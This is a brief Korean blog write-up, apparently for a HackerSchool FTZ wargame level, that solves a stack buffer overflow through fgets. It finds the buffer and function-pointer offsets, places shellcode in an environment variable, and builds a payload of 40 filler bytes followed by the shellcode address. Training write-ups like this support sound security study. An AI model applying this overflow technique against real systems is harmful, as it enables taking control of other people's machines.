문제 분석
1. fgets bof
2. *call = shell_addr
풀이
1. buf 주소 확인 : ebp-56
call 주소 확인 : ebp-16
0xffffffc8(%ebp) = ebp-56
0xfffffff0(%ebp) = ebp-16
2. shellcode 환경변수로 저장 후 주소 확인 : 0xbffffbe2
자세한 설명 : https://pu1et-panggg.tistory.com/51
3. payload = dummy(40bytes) + shellcode_addr
= "a"*40 + 0xbffffbe2
'시스템 > FTZ' 카테고리의 다른 글
hackerschool FTZ : level 20 풀이 (0) | 2019.04.02 |
---|---|
hackerschool FTZ : level 18 풀이 (0) | 2019.04.02 |
hackerschool FTZ : level 16 풀이 (0) | 2019.04.02 |
hackerschool FTZ : level 15 풀이 (0) | 2019.04.02 |
hackerschool FTZ : level 14 풀이 (0) | 2019.04.02 |